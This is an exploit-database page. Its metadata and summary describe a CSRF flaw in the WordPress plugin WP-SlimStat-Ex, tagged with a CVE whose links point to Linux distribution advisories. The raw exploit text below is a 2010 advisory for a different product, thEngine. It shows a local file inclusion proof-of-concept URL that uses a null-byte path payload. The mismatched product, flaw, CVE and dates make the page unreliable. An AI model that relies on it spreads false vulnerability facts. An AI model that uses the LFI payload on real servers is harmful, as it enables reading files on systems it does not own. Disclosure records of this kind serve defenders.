header-logo
Suggest Exploit
vendor:
WP-SlimStat-Ex
by:
team_elite
5,9
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: WP-SlimStat-Ex
Affected Version From: 3.9.3.1
Affected Version To: 3.9.3.1
Patch Exists: Yes
Related CWE: CVE-2020-14093
CPE: a:wp-slimstat-ex:wp-slimstat-ex:3.9.3.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2020-14093/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2020-14093/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2020

WordPress Plugin WP-SlimStat-Ex 3.9.3.1 – Cross-Site Request Forgery (CSRF)

WP-SlimStat-Ex is a WordPress plugin that allows users to track their website's traffic. The plugin is vulnerable to Cross-Site Request Forgery (CSRF) attacks, which can be used to perform administrative actions on behalf of the user. An attacker can exploit this vulnerability by tricking a logged-in administrator into clicking a malicious link. This can be used to delete all the data collected by the plugin, or to add a new administrator account.

Mitigation:

Users should upgrade to the latest version of the plugin (3.9.3.2).
Source

Exploit-DB raw data:

=============================================================================================
=============================================================================================
==   @@@@@@@@  @@@@@@  @@@@@@@  @@       @@         @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==   @@@@@@@@  @@@@@@  @@@@@@@  @@@     @@@	    @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==      @@     @@      @@   @@  @@ @   @ @@         @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@  @ @  @@         @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@@@@@@  @@   @   @@         @@@@@@  @@      @@     @@     @@@@@@   ==
==      @@     @@      @@   @@  @@       @@         @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@       @@         @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@   @@  @@       @@         @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==      @@     @@@@@@  @@   @@  @@       @@ @@@@@@@ @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==											   ==
=============================================================================================
=============================================================================================
			|||			|||
			|||			|||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~    Greetz and Thanks to: All member manadocoding.net               ~~~~
~~~~									~~~~
~~~~    MC team : team_elite , devilbat , virusfree , doniskynet ,      ~~~~
~~~~              lumut-- , kisame                                      ~~~~
~~~~                                                                    ~~~~
~~~~    thanks for : cr4wl3r                                            ~~~~
~~~~                                                                    ~~~~
~~~~    Discovered: team_elite[at]Auzs.net              	        ~~~~
~~~~									~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			|||			|||
			|||			|||
############################################################################
##									  ##			
##      Download Script: http://sourceforge.net/projects/thengine/files/  ##
##									  ##
##      Code [test.class.php]:						  ##
## 									  ##
############################################################################
			|||			|||
			|||			|||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xx	<?php									    xx
xx	    /**									    xx
xx	    * thEngine								    xx
xx	    * Copyright (c) 2006 Thion, http://thion.jogger.pl			    xx
xx	    * This program is free software; you can redistribute it and/or modify  xx
xx	    * it under the terms of the GNU Public General Public License as        xx
xx	    * published by the Free Software Foundation; either version 2.1 of the  xx
xx	    * License, or (at your option) any later version.                       xx
xx	    */									    xx
xx    										    xx
xx	    require_once('languages/'.$strLanguage.'/test.class.php');		    xx
xx	    class test								    xx
xx	    {									    xx
xx	        public function __construct()					    xx
xx	        {								    xx
xx	            global $opt;						    xx
xx	            $opt -> assign('message', TEST);				    xx
xx 	           $opt -> display('test.tpl');					    xx
xx	        }								    xx
xx	    }									    xx
xx	?>									    xx
xx										    xx
xx       PoC: [thEngine_path]/modules/test/test.class.php?strLanguage=[LFI%00]      xx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* -                          ,              
* -                        @@               
* -                      @@#                
* -                    :@@;                 
* -                   @@@@@        ......`  
* -                  @@@@.@@@@@@@@@@@#      
* -             @@@@@@@@@@@@@@@@@@`         
* -               @@@@@@@@@@@@@@@@@@@@;     
* -              #@@@@@@@@@@@@@@@@@         
* -            `@@,@@@@@@@@@@@@@@@@@:       
* -           @@@+@@@@@@@ @@@@@@@;@@@`      
* -         :@@@@@@@@@:@,; @@@@@@@ .@@      
* -        @@@@@@@@@@@  :  @@@@@@@@  @@     
* -       @@@@'     `   ` @@@@@@@@@:  +.    
* -       .@@            @@@@@@@@@@@   .    
* -           ,       +@@@@@@@@@@@@@        
* -            +@@@@@@@@@@@@@@@@@@@@#       
* -           ,@@@@@@@@@@@@@@@@@ +@@@       
* -        `@@@@@@@@@@@@@@@@@@@   @@@       
* -       @@@@@@@@@@@@@@@@@@@     @@`       
* -      @@@@@@@@@@@@@@@@@@       @@        
* -     +@@@@@@@@@@; @@@#         @         
* -     @@@@@@@@@         :                 
* -     @@@@@@@@           ,@@              
* -    @@@@@@@@@             @@@'           
* -    @@@@@@@`@               @@@;         
* -    @@@@@@@  @       @.  @@@@@@@@        
* -    @@@@@@@@@        @@@@@@@@@@@@@#      
* -     @@@@@@@@@@@@    @@@@@@@@@@@@@@@     
* -     @ @@@@@@@     ;@@@@@@@@@@@@@@@@@    
* -     @ @@@@@@@@@@@@@@@@@@@      ,@@@@+   
* -       @@@@@@@@@@@@@@@@@@@        @@@@   
* -       @@@ @@@@@@@@@  @@@@@@;     @@@@   
* -       @@    @@@@@@@`  @@@        . @@.  
* -       @@      ; @@@@#  :@@@@@#     @@.  
* -       @           @@@:             ;@   
* -      ;`             @@             ;@   
* -                      @@            @    
* -                       @            #    
* -                       :           :     
* --------------------------------------------->>>> bugs found on may 05 2010 by team_elite.

Navigation

Suggest Exploit

Services By CQR